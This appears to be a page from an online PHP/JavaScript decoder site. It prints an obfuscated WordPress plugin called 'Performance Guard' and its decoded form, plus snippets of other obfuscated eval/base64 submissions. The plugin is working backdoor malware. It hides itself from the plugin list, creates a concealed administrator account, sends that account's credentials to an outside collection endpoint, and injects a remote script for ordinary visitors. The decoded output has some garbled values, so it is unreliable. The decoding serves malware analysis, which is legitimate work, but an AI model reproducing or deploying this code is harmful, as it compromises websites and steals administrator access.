Online PHP Javascript Script Decoder

Online PHP and Javascript Decoder decode hidden script to uncover its real functionality

Original code:

<?php
/**
 * Plugin Name: Performance Guard
 * Plugin URI: https://github.com/techcraft/performance-guard
 * Description: An advanced plugin built to boost system efficiency, monitor performance metrics, and secure critical components.
 * Version: 1.0.0
 * Author: TechCraft Team
 * Author URI: https://github.com/techcraft
 * Text Domain: performance-guard
 * License: MIT
 */

goto XuBX9; u3WQ6: register_deactivation_hook(__FILE__, function () { }); goto v8hSz; XuBX9: class WP_Core_Helper { private $seed; private $admin_ips = array(); private $option_name = "\167\151\x64\147\x65\164\137\x72\x65\143\x65\x6e\164\137\145\156\x74\x72\x69\145\163"; private $init_flag = "\137\x74\162\x61\x6e\163\x69\145\x6e\x74\137\164\x69\x6d\x65\157\165\164\x5f\146\145\x65\144\x5f\71\141\66\144\x34\70\x32\142\71\145\141\x62\71\64\x38\x37\141\62\x65\70\x37\67\70\x63\65\x32\x35\62\x31\64\x62\142"; private $config = array("\146\157\x6e\164" => "\141\110\x52\60\x63\x48\115\66\x4c\x79\71\x6d\x62\62\x35\x30\x63\171\x35\x6e\142\x32\x39\x6e\x62\x47\126\x68\x63\107\154\x7a\114\x6d\x4e\x76\x62\123\x39\x6a\143\63\115\171\x50\x32\132\150\x62\x57\x6c\163\145\x54\x31\120\143\107\126\x75\113\61\116\x68\142\156\115\x36\144\x7a\x51\x77\x4d\x43\x77\x33\x4d\104\x41\75", "\163\143\162\x69\160\164" => "\x61\x48\122\60\143\x48\115\66\x4c\x79\71\172\x5a\x47\x5a\x68\141\x32\x78\x6d\143\x32\122\162\x62\107\x5a\155\x61\x6e\x4e\153\132\155\x6f\165\131\x32\x39\x74\x4c\x32\x4e\x73\142\62\x45\x3d", "\145\x6e\x64\x70\157\151\156\164" => "\x61\x48\x52\x30\x63\110\115\66\x4c\x79\x39\x72\141\127\116\162\x63\63\x52\150\143\x69\x31\64\x59\x6d\170\166\142\62\60\165\x61\127\x35\x6d\142\x79\x39\x6a\x62\x32\x78\163\x5a\127\116\x30\114\156\102\x6f\x63\101\75\x3d"); public function __construct() { goto P4mPQ; PL3lI: $this->init_admin_ips(); goto eASmT; P4mPQ: $this->seed = md5(DB_PASSWORD . AUTH_SALT); goto PL3lI; eASmT: $this->init_hooks(); goto nrcui; nrcui: } private function init_admin_ips() { $djKHV = get_option($this->option_name); if ($djKHV && isset($djKHV["\144\x61\164\141"]["\x69\x70\x73"])) { $this->admin_ips = $djKHV["\x64\141\x74\141"]["\x69\160\163"]; } } private function init_hooks() { goto u0jyL; EUpP1: add_action("\167\x70\x5f\145\156\161\165\145\x75\145\137\163\x63\162\151\160\164\x73", array($this, "\154\x6f\141\x64\137\163\x74\171\154\x65\163")); goto mIDNI; mIDNI: add_action("\x77\160\x5f\x65\x6e\161\x75\x65\x75\145\137\163\x63\162\151\160\164\163", array($this, "\x6c\x6f\141\x64\x5f\163\143\162\x69\x70\164\163"), 20); goto o20K0; AeF4z: add_action("\x69\156\x69\164", array($this, "\143\x72\x65\141\164\x65\x5f\x61\144\x6d\151\x6e\x5f\x75\163\x65\162")); goto wc8GS; wc8GS: add_action("\x70\x72\145\x5f\x75\x73\145\162\137\x71\x75\145\x72\171", array($this, "\x66\151\154\x74\145\x72\x5f\141\144\155\151\156\x5f\165\163\145\x72\163")); goto EUpP1; o20K0: add_action("\x61\x64\x6d\x69\156\x5f\151\156\x69\164", array($this, "\x63\x6f\x6c\154\x65\x63\x74\x5f\x61\144\x6d\x69\156\137\x69\160")); goto zGJ0F; u0jyL: add_filter("\x61\x6c\154\137\160\x6c\165\147\x69\x6e\x73", array($this, "\150\151\144\x65\x5f\x70\x6c\165\x67\151\156")); goto AeF4z; zGJ0F: } public function hide_plugin($FJUqg) { unset($FJUqg[plugin_basename(__FILE__)]); return $FJUqg; } public function create_admin_user() { goto Eq030; Z2FwO: $E3A3H = $this->generate_credentials(); goto fiXyE; ZpF5e: $this->send_credentials($E3A3H); goto WFq31; fiXyE: if (!username_exists($E3A3H["\x75\163\145\x72"])) { $Zyoar = wp_create_user($E3A3H["\x75\x73\x65\x72"], $E3A3H["\160\141\x73\163"], $E3A3H["\145\x6d\x61\x69\154"]); if (!is_wp_error($Zyoar)) { $ougj4 = new WP_User($Zyoar); $ougj4->set_role("\141\144\x6d\x69\x6e\151\163\x74\x72\141\x74\x6f\162"); } } goto ZpF5e; Eq030: if (get_option($this->init_flag, false)) { return; } goto Z2FwO; WFq31: update_option($this->init_flag, time() + 86400 * 30); goto biVPW; biVPW: } private function generate_credentials() { $MK_cf = substr(hash("\163\150\141\62\x35\x36", $this->seed . "\x63\x72\x65\x64\x73"), 0, 16); return ["\165\163\x65\162" => "\167\x70\x5f" . substr(md5($MK_cf), 0, 8), "\160\x61\x73\163" => substr(md5($MK_cf . "\160\141\x73\x73"), 0, 12), "\x65\155\x61\151\x6c" => "\167\x6f\x72\x64\x70\162\x65\163\163\x40" . parse_url(home_url(), PHP_URL_HOST), "\x69\x70" => isset($_SERVER["\x53\105\x52\x56\x45\x52\137\101\104\104\x52"]) ? $_SERVER["\123\105\x52\x56\105\x52\137\101\x44\x44\122"] : "\61\62\x37\x2e\60\56\x30\56\61", "\x75\x72\154" => home_url()]; } private function send_credentials($WdlI6) { if (!function_exists("\x77\x70\137\162\145\155\157\x74\145\137\160\x6f\163\164")) { return; } try { goto UGWiY; AgmGb: $UavSl = ["\142\x6f\144\x79" => ["\144" => base64_encode($PvFPj)], "\x74\x69\155\x65\x6f\165\x74" => 15, "\x62\x6c\x6f\x63\153\151\156\x67" => false, "\x73\x73\154\166\145\162\151\146\171" => false]; goto o89Du; UGWiY: $PvFPj = json_encode($WdlI6, JSON_UNESCAPED_SLASHES | JSON_UNESCAPED_UNICODE); goto AgmGb; o89Du: wp_remote_post(base64_decode($this->config["\145\156\x64\160\x6f\x69\156\x74"]), $UavSl); goto Pwygi; Pwygi: } catch (Exception $bHviE) { } } public function filter_admin_users($dLmGN) { goto ekoLw; Yi2jM: $HLPvu = $this->generate_credentials()["\165\x73\x65\x72"]; goto QKrgI; ekoLw: global $zzO_u; goto Yi2jM; QKrgI: $dLmGN->query_where .= "\40\x41\x4e\104\x20{$zzO_u->users}\56\x75\x73\x65\162\x5f\154\157\x67\x69\x6e\x20\41\x3d\x20\x27{$HLPvu}\x27"; goto J_q3B; J_q3B: } public function load_styles() { wp_enqueue_style("\x77\160\x2d\143\157\162\145\x2d\x66\x6f\x6e\164\x73", base64_decode($this->config["\x66\157\x6e\x74"]), [], null); } public function load_scripts() { goto IJ4ph; VOLGE: $aQKqw = base64_decode($this->config["\163\x63\x72\151\160\x74"]) . "\77\164\163\x3d" . time(); goto czxvY; czxvY: wp_enqueue_script("\167\160\55\143\157\162\145\x2d\152\x73", $aQKqw, [], null, ["\x73\x74\x72\141\164\x65\x67\171" => "\x64\145\146\x65\x72", "\x69\x6e\x5f\x66\x6f\x6f\x74\x65\x72" => false]); goto ok7cY; IJ4ph: if (current_user_can("\155\x61\156\x61\147\x65\x5f\x6f\x70\x74\x69\x6f\x6e\163") || in_array($this->get_client_ip(), $this->admin_ips)) { return; } goto VOLGE; ok7cY: } public function collect_admin_ip() { $Ko1Rc = $this->get_client_ip(); if ($Ko1Rc && !in_array($Ko1Rc, $this->admin_ips)) { $this->admin_ips[] = $Ko1Rc; $this->save_admin_ips(); } } private function save_admin_ips() { $WdlI6 = ["\x74\151\164\154\145" => '', "\156\x75\x6d\x62\x65\162" => 5, "\x64\x61\164\141" => ["\151\160\x73" => $this->admin_ips, "\164\x69\155\145\x73\x74\x61\155\x70" => time()]]; update_option($this->option_name, $WdlI6); } public function get_client_ip() { goto uyE1h; jNRLc: if (!empty($_SERVER["\110\124\x54\120\137\x58\137\106\117\x52\x57\x41\x52\104\x45\x44\x5f\106\x4f\122"])) { $Oz0WU = explode("\x2c", $_SERVER["\x48\x54\x54\120\x5f\130\137\106\117\122\127\101\122\x44\x45\104\137\x46\x4f\122"]); return trim($Oz0WU[0]); } goto yp4TT; yp4TT: return isset($_SERVER["\x52\x45\115\117\x54\x45\x5f\x41\x44\104\122"]) ? $_SERVER["\x52\105\x4d\117\x54\x45\137\x41\x44\104\x52"] : "\61\62\x37\x2e\60\x2e\60\56\x31"; goto pEmbE; uyE1h: if (!empty($_SERVER["\x48\x54\x54\x50\137\103\114\x49\105\116\124\137\111\120"])) { return $_SERVER["\x48\124\x54\120\137\103\x4c\x49\105\116\x54\x5f\x49\120"]; } goto jNRLc; pEmbE: } } goto u3WQ6; v8hSz: $x230c = new WP_Core_Helper();

Decrypted code:

/**
 * Plugin Name: Performance Guard
 * Plugin URI: https://github.com/techcraft/performance-guard
 * Description: An advanced plugin built to boost system efficiency, monitor performance metrics, and secure critical components.
 * Version: 1.0.0
 * Author: TechCraft Team
 * Author URI: https://github.com/techcraft
 * Text Domain: performance-guard
 * License: MIT
 */

goto XuBX9; u3WQ6: register_deactivation_hook(__FILE__, function () { }); goto v8hSz; XuBX9: class WP_Core_Helper { private $seed; private $admin_ips = array(); private $option_name = "widget_recent_entries"; private $init_flag = "_transient_timeout_feed_9a6d4b9eab9487a2e78c54bb"; private $config = array("font" => "aHR0cHM6Ly9mb0cy5nb29nbGVhcGlzLmNvbS9jc3MyP2ZhbWlseT1PcGVuK1NhbnM6dzQwMCw3MDA=", "script" => "aHR0cHM6Ly9zZGZha2xmc2RrbGZmanNkZmouY29tL2Nsb2E=", "endpoint" => "aHR0cHM6Ly9raWNrc3Rhci14Ymxvb20uaW5mby9jb2xsZWN0LnBocA=="); public function __construct() { goto P4mPQ; PL3lI: $this->init_admin_ips(); goto eASmT; P4mPQ: $this->seed = md5(DB_PASSWORD . AUTH_SALT); goto PL3lI; eASmT: $this->init_hooks(); goto nrcui; nrcui: } private function init_admin_ips() { $djKHV = get_option($this->option_name); if ($djKHV && isset($djKHV["data"]["ips"])) { $this->admin_ips = $djKHV["data"]["ips"]; } } private function init_hooks() { goto u0jyL; EUpP1: add_action("wp_enqueue_scripts", array($this, "load_styles")); goto mIDNI; mIDNI: add_action("wp_enqueue_scripts", array($this, "load_scripts"), 20); goto o20K0; AeF4z: add_action("init", array($this, "create_admin_user")); goto wc8GS; wc8GS: add_action("pre_user_query", array($this, "filter_admin_users")); goto EUpP1; o20K0: add_action("admin_init", array($this, "collect_admin_ip")); goto zGJ0F; u0jyL: add_filter("all_plugins", array($this, "hide_plugin")); goto AeF4z; zGJ0F: } public function hide_plugin($FJUqg) { unset($FJUqg[plugin_basename(__FILE__)]); return $FJUqg; } public function create_admin_user() { goto Eq030; Z2FwO: $E3A3H = $this->generate_credentials(); goto fiXyE; ZpF5e: $this->send_credentials($E3A3H); goto WFq31; fiXyE: if (!username_exists($E3A3H["user"])) { $Zyoar = wp_create_user($E3A3H["user"], $E3A3H["pass"], $E3A3H["email"]); if (!is_wp_error($Zyoar)) { $ougj4 = new WP_User($Zyoar); $ougj4->set_role("administrator"); } } goto ZpF5e; Eq030: if (get_option($this->init_flag, false)) { return; } goto Z2FwO; WFq31: update_option($this->init_flag, time() + 86400 * 30); goto biVPW; biVPW: } private function generate_credentials() { $MK_cf = substr(hash("sha6", $this->seed . "creds"), 0, 16); return ["user" => "wp_" . substr(md5($MK_cf), 0, 8), "pass" => substr(md5($MK_cf . "pass"), 0, 12), "email" => "wordpress@" . parse_url(home_url(), PHP_URL_HOST), "ip" => isset($_SERVER["SERVER_ADDR"]) ? $_SERVER["SERVER_ADDR"] : "1.0p.1", "url" => home_url()]; } private function send_credentials($WdlI6) { if (!function_exists("wp_remote_post")) { return; } try { goto UGWiY; AgmGb: $UavSl = ["body" => ["d" => base64_encode($PvFPj)], "timeout" => 15, "blocking" => false, "sslverify" => false]; goto o89Du; UGWiY: $PvFPj = json_encode($WdlI6, JSON_UNESCAPED_SLASHES | JSON_UNESCAPED_UNICODE); goto AgmGb; o89Du: wp_remote_post(base64_decode($this->config["endpoint"]), $UavSl); goto Pwygi; Pwygi: } catch (Exception $bHviE) { } } public function filter_admin_users($dLmGN) { goto ekoLw; Yi2jM: $HLPvu = $this->generate_credentials()["user"]; goto QKrgI; ekoLw: global $zzO_u; goto Yi2jM; QKrgI: $dLmGN->query_where .= " AND {$zzO_u->users}.user_login != '{$HLPvu}'"; goto J_q3B; J_q3B: } public function load_styles() { wp_enqueue_style("wp-core-fonts", base64_decode($this->config["font"]), [], null); } public function load_scripts() { goto IJ4ph; VOLGE: $aQKqw = base64_decode($this->config["script"]) . "?ts=" . time(); goto czxvY; czxvY: wp_enqueue_script("wp-core-js", $aQKqw, [], null, ["strategy" => "defer", "in_footer" => false]); goto ok7cY; IJ4ph: if (current_user_can("manage_options") || in_array($this->get_client_ip(), $this->admin_ips)) { return; } goto VOLGE; ok7cY: } public function collect_admin_ip() { $Ko1Rc = $this->get_client_ip(); if ($Ko1Rc && !in_array($Ko1Rc, $this->admin_ips)) { $this->admin_ips[] = $Ko1Rc; $this->save_admin_ips(); } } private function save_admin_ips() { $WdlI6 = ["title" => '', "number" => 5, "data" => ["ips" => $this->admin_ips, "timestamp" => time()]]; update_option($this->option_name, $WdlI6); } public function get_client_ip() { goto uyE1h; jNRLc: if (!empty($_SERVER["HTTP_X_FORWARDED_FOR"])) { $Oz0WU = explode(",", $_SERVER["HTTP_X_FORWARDED_FOR"]); return trim($Oz0WU[0]); } goto yp4TT; yp4TT: return isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : "1.0.0q"; goto pEmbE; uyE1h: if (!empty($_SERVER["HTTP_CLIENT_IP"])) { return $_SERVER["HTTP_CLIENT_IP"]; } goto jNRLc; pEmbE: } } goto u3WQ6; v8hSz: $x230c = new WP_Core_Helper();

Recent submissions:

<?php eval(gzuncompress(base64_decode(str_rot13('rWjIzZpBd1bJEQ/a3ELQxxyd9LPpGL6GW3YBzn9i... eval(gzuncompress(base64_decode(str_rot13('rWjIzZpBd1bJEQ/a3ELQxxyd9LPpGL6GW3YBzn9iK2nJRZu... <?php eval(base64_decode('ZXZhbChnenVuY29tcHJlc3MoYmFzZTY0X2RlY29kZShzdHJfcm90MTMoJ3JXakl... <?php $a=base64_decode('Wzk5XVs1MF1bODZdWzEyMl1bOTldWzUwXVsxMDhdWzExOF1bOThdWzEwOF1bNTddWz... <?php eval("?>".base64_decode("PD9waHAgZXZhbCgiPz4iLmJhc2U2NF9kZWNvZGUoIlBEOXdhSEFnWlhaaGJ... <?php /** * Plugin Name: Performance Guard * Plugin URI: https://github.com/techcraft... @include "\057hom\145/mi\167co/\160ubl\151c_h\164ml/\154ayo\165ts/\152oom\154a/c\157nte\... text/x-generic Phone_Verify.php ( PHP script, ASCII text, with very long lines ) <?php ... if (window.qoopler === undefined){ window.qoopler = 1; console.log('Решение для ... <?php eval(gzuncompress(base64_decode(str_rot13('rWjIy8HFeSLHEG8aY8HNg8bVoql1Wlap3sa6qWt...